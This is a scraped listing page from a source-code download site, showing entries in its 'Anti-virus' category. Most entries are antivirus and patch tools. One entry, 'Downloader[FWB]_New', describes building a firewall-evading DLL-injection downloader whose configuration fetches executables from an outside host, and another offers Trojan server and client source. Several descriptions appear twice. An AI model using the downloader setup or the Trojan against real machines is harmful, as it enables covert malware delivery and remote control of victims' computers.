CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - directory
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Search - directory - List
[
Anti-virus
]
WindowsANIZeroDayPatchSource
DL : 0
// Quick and dirty blanket fix for ANI zero-day vulnerabilities. // Prevents loading cursors from outside the Windows directory. // // Derek Soeder - eEye Digital Security - 03/29/2007-/ / Quick and dirty blanket fix for ANI zero - day vulnerabilities. / / Prevents loading curs ors from outside the Windows directory. / / / / De rek Soeder - eEye Digital Security-03/29/2007
Date
: 2008-10-13
Size
: 4.58kb
User
:
lee
[
Anti-virus
]
杀毒软件实时杀毒的奥秘(含源程序)
DL : 0
市面上所有号称\"虚拟机\",\"_blank\",防火墙\"的实时监控杀毒软件无一不是使用的IFSHOOK技术.下面给出用VTOOLSD写的代码.也就是所有实时杀毒软件的奥秘.同时,很多拦截文件操作的软件,例如对目录加密,文件加密等,也采用了雷同的技术. -market called "virtual machine", "_blank" firewall "real-time monitoring of antivirus software are all IFSHOOK use of technology. Below is used 95/98 writing code. Real-time is all the mysteries of antivirus software. Meanwhile, many intercept file manipulation software, for example, the directory encryption, file encryption, but also adopted a similar technology.
Date
: 2008-10-13
Size
: 2.34kb
User
:
宁静
[
Anti-virus
]
杀毒软件实时杀毒的奥秘(含源程序)
DL : 0
市面上所有号称"虚拟机","_blank",防火墙"的实时监控杀毒软件无一不是使用的IFSHOOK技术.下面给出用VTOOLSD写的代码.也就是所有实时杀毒软件的奥秘.同时,很多拦截文件操作的软件,例如对目录加密,文件加密等,也采用了雷同的技术. -market called "virtual machine", "_blank" firewall "real-time monitoring of antivirus software are all IFSHOOK use of technology. Below is used 95/98 writing code. Real-time is all the mysteries of antivirus software. Meanwhile, many intercept file manipulation software, for example, the directory encryption, file encryption, but also adopted a similar technology.
Date
: 2025-12-30
Size
: 2kb
User
:
宁静
[
Anti-virus
]
WindowsANIZeroDayPatchSource
DL : 0
// Quick and dirty blanket fix for ANI zero-day vulnerabilities. // Prevents loading cursors from outside the Windows directory. // // Derek Soeder - eEye Digital Security - 03/29/2007-//Quick and dirty blanket fix for ANI zero- day vulnerabilities.// Prevents loading curs ors from outside the Windows directory.//// De rek Soeder- eEye Digital Security-03/29/2007
Date
: 2025-12-30
Size
: 4kb
User
:
lee
[
Anti-virus
]
showip
DL : 0
QQ_Plugins.bat就是源代码,要编译直接运行它就可以了。MASM32必须安装在与源代码同一盘下的masm32目录下。推荐安装masm32 v8.0-QQ_Plugins.bat is the source code, it is necessary to compile it directly to run it. MASM32 must be installed on the same disc with the source code under the masm32 directory. Recommended install masm32 v8.0
Date
: 2025-12-30
Size
: 538kb
User
:
[
Anti-virus
]
CartaTecnicaNOMW1401
DL : 0
E-Books Visual C++ Books Java Books Delphi-C++Builder software engineering Certification book Other Books Document software engineering File Formats Project Manage Development Research IT Hero Communication Project Design Software Testing [Expand all] [Recomment to add directory] (Important) Why your files are not be used? 1.The content is too simple 2.Is not a sourcecode or document 3.lost some files 4.Description is not detailed or not correct 5.Compressed file has password 6.Sourcecode duplicate or already exist
Date
: 2025-12-30
Size
: 256kb
User
:
kamui
[
Anti-virus
]
Downloader[FWB]_New
DL : 0
编译说明:{ 程序采用DLL插入--9x 和NT下都可以插入 穿防火墙,可以自定义三条连接 后面两个还可以休眠5秒后运行--具体看代码 程序编译压缩后只有2.7k } 首先打开dlldownloader.asm文件~ url1s byte http://www.Anskya.Net/1.exe , 0 url2s byte http://www.Anskya.Net/2.exe , 0 url3s byte http://www.Anskya.Net/2.exe , 0 修改以上三个连接 exe1s byte heart1.exe , 0 exe2s byte heart2.exe , 0 exe3s byte heart3.exe , 0 这三个是保存的文件名--只需要填写文件名就可以了~~文件默认保存在临时文件目录 然后保存代码运行makeDLL.bat 然后直接运行makeEXE.bat 如果需要修改插入进程的话~修改 szExplorer byte Shell_TrayWnd , 0 中的类名----例如 QQ的窗口类名就是#32770 修改好以后就可以保存了~ 然后运行makeEXE.bat就可以编译出来了 差点忘记~一定要装MASM32哦~~最好是V8.2-Compile Description: (sorry too lazy to paint Synthesizer) ( Procedure used DLL insertion- 9x and NT can be inserted under all Wear a firewall, you can customize the three connections The latter two can also be sleep after 5 seconds to run- specifically look at the code Program compiled compressed only 2.7k ) First, open the file ~ dlldownloader.asm url1s byte http://www.Anskya.Net/1.exe , 0 url2s byte http://www.Anskya.Net/2.exe , 0 url3s byte http://www.Anskya.Net/2.exe , 0 Modify the above three connections exe1s byte heart1.exe , 0 exe2s byte heart2.exe , 0 exe3s byte heart3.exe , 0 These three are saved in the file name- just need to fill in the file name can be a ~ ~ the file by default saved in the temporary file directory And then save the code to run makeDLL.bat And then run directly makeEXE.bat If you need to modify the insertion process, if ~ changes szExplorer byte Shell_TrayWnd , 0 For example, the class name---- QQ
Date
: 2025-12-30
Size
: 29kb
User
:
张启航
[
Anti-virus
]
Antivirussoftware
DL : 0
本程序只是简单介绍杀毒软件的编写方法,所以有很多不完善的地方,包括: 1,本程序是以冲击波蠕虫做的例子 2,文件遍历只搜索了 s目录下的文件 3,本程序不能查杀冲击波变种 本程序只是用做代码交流,如有错误,还请多多包含! -This procedure is a simple introduction of antivirus software compiling method, so there are many imperfect places, including: In 1, this procedure is to the Blaster Worm as Example 2, file traversal search only the s directory under the file In 3, this procedure cannot kill shockwave variants This procedure is only used as a code sharing, if there is an error, please include!
Date
: 2025-12-30
Size
: 3kb
User
:
庞文博
[
Anti-virus
]
SockCommander
DL : 0
其中SocketListener目录下是木马Server端源代码,SocketCommand目录下是木马Client端源代码。 2) 用Visual Studio 6.0环境分别编译这两部分代码 3) 运行SocketListener应用程序,也就是启动了木马被控制端-Trojan Server which SocketListener directory side source code the SocketCommand directory, Trojan Client-side source code. 2) Visual Studio 6.0 environment compile both part of the code 3) the run SocketListener application, that is, started the Trojan control terminal
Date
: 2025-12-30
Size
: 3.84mb
User
:
程英
[
Anti-virus
]
KillViking
DL : 0
一个查杀Viking病毒源码程序,VC6编写,有文件目录检索算法。-A Viking killing the virus source programs, VC6 prepared file directory retrieval algorithm.
Date
: 2025-12-30
Size
: 48kb
User
:
王步军
[
Anti-virus
]
huifuwenjianshuxing
DL : 0
本程序消除文件夹被病毒置上的隐藏属性 当U盘感染病毒后,原文件夹被隐藏,在其根目录下生成Administrator Porn.exe和 system .scr文件夹伪装病毒,将病毒清除后,文件夹的隐藏属性不可修改时,可用此程序,消除文件夹被病毒置上的隐藏属性-This procedure is to eliminate folder is hidden attribute on the virus When U disk after infection, the original folder is hidden, generated in the root directory Administrator Porn. Exe and system. The SCR folder camouflage virus, the virus removal, folder hidden attribute cannot be modified, this program are available, and eliminate the hidden attribute on the folder by viruses.
Date
: 2025-12-30
Size
: 26.22mb
User
:
wqfwyj
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.